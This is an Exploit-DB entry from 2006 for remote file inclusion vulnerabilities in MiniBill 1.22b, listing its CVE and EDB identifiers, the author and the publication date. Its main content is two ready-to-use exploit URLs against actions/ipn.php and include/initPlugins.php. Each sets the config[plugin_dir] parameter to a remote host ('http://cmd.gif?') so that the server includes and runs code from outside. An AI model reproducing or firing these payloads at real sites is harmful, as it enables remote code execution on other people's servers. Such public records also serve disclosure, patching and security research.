# Title: MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities
# EDB-ID: 2272
# CVE-ID: (2006-4489)
# OSVDB-ID: (28258)
# Author: the master
# Published: 2006-08-29
# Verified: yes
# Download Exploit Code
# Download N/A
######################################################################## # MiniBill v1.22 Beta Remote File Inclusion Vulnerability # # Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip # # Found By: the master # ######################################################################## # exploit: # # http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif? # http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif? ######################################################################## # milw0rm.com [2006-08-29]